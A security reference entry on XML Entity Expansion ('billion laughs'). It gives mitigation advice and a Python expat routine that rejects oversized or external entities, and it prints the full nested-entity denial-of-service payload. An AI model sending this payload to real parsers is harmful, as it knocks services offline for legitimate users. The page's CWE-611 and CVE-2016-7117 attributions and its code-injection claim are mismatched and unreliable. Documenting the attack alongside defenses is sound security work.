Availability / XML Entity Expansion

Web and API

Description

XML Entity Expansion (CWE-611) is an attack in which an attacker sends malicious XML input to an XML parser, causing the parser to consume an excessive amount of resources (CPU, memory, etc.). The input declares entities that reference other entities many times over, so that a single reference in the document body expands to an enormous amount of text. This can result in a denial of service (DoS), disrupting the availability of the application or website. It can also be used to inject malicious code into the application or website. According to the OWASP Testing Guide, XML Entity Expansion is often used in combination with XML External Entity (XXE) attacks.

Risk

XML Entity Expansion can have serious consequences for the availability of a web application or website. By consuming excessive resources, an attacker can deny service to legitimate users, disrupting the application or website. Furthermore, it can be used to inject malicious code into the application or website, which can lead to further disruption and data loss.

Solution

XML Entity Expansion can be mitigated by limiting the number and size of XML entities a document may declare, and by disabling external entities. Additionally, XML parsers should be configured to reject documents whose entities are excessive in number or in expanded size, rather than attempting to expand them.

Example

The following example code illustrates an XML Entity Expansion attack, taken from CVE-2016-7117.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE lolz [
 <!-- each level references the previous one ten times, so &lol9; expands to 10^9 copies of "lol" -->
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
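The following Python is an added example, not part of the original page: it applies the limits from the Solution section with the standard-library expat parser, refuses external entities and external DTD subsets, and rejects the document above at the declaration of lol4 because that entity's computed expansion already exceeds the cap. The limit values, the function and constant names, and the shortened copy of the document are assumptions of this example.

```python
import re
import xml.parsers.expat as expat

# Assumed limits for this example; size them to the documents the app accepts.
MAX_ENTITY_DECLS = 10          # reject DTDs declaring more internal entities
MAX_EXPANSION_CHARS = 10_000   # reject any entity whose full expansion is bigger
_REF = re.compile(r"&([^&;\s]+);")   # &name; references inside an entity value

class EntityLimitError(ValueError):
    """Raised when a document's DTD exceeds the configured entity limits."""

def parse_limited(document: str) -> str:
    """Return the document's character data, or raise EntityLimitError.
    Each internal entity's expanded size is computed at declaration time from
    the entities it references, so lol1..lol9 is rejected before any expansion."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    expanded, text = {}, []   # name -> expanded length; collected character data

    def start_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise EntityLimitError("external DTD subset not allowed")

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if value is None:   # no literal value means an external entity
            raise EntityLimitError(f"external entity {name!r} not allowed")
        if len(expanded) >= MAX_ENTITY_DECLS:
            raise EntityLimitError("too many entity declarations")
        size = len(_REF.sub("", value))        # literal characters in the value
        for ref in _REF.findall(value):        # plus the size of each reference
            size += expanded.get(ref, 1)       # unknown or predefined ref: 1 char
        if size > MAX_EXPANSION_CHARS:
            raise EntityLimitError(f"entity {name!r} would expand to {size} chars")
        expanded[name] = size

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.CharacterDataHandler = text.append
    parser.Parse(document, True)
    return "".join(text)

# The page's example cut at lol4, which is already enough to trip the limit.
NESTED_ENTITIES = (
    '<!DOCTYPE lolz [<!ENTITY lol "lol">'
    '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
    '<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">'
    '<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">'
    '<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">'
    ']><lolz>&lol4;</lolz>'
)
```

A benign document with a handful of small entities still parses normally; only documents whose declared entities would expand past the configured caps, or that pull in anything external, are refused before the parser does the work.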
